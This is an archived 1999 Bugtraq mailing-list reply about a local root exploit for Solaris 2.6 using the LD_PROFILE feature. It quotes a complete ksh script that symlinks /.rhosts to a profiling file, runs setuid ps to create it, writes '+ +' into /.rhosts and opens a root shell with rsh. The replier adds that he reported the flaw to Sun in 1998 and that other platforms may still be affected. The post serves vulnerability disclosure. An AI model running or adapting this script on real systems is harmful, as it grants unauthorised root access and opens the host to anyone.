Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: LD_PROFILE local root exploit for solaris 2.6

From: peak () ARGO TROJA MFF CUNI CZ (Pavel Kankovsky)
Date: Sat, 25 Sep 1999 02:25:52 +0200

On Wed, 22 Sep 1999, Steve Mynott wrote:


works on solaris 2.6 sparc anyway...

#! /bin/ksh
#  LD_PROFILE local root exploit for solaris
#  steve () tightrope demon co uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + >  /.rhosts
rsh -l root localhost csh -i


Old news. I discovered this problem and informed Sun about it in
June 1998. I cannot verify it right now but I think they have already made
a patch for it.

GNU libc 2.something used to be affected as well. The odds are other
platforms having this particular nifty feature (if they exist at all) are
still vulnerable because I forgot to told Bugtraq about it.
Oh, mea culpa! :)

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
Previous By Date Next
Previous By Thread Next

Current thread: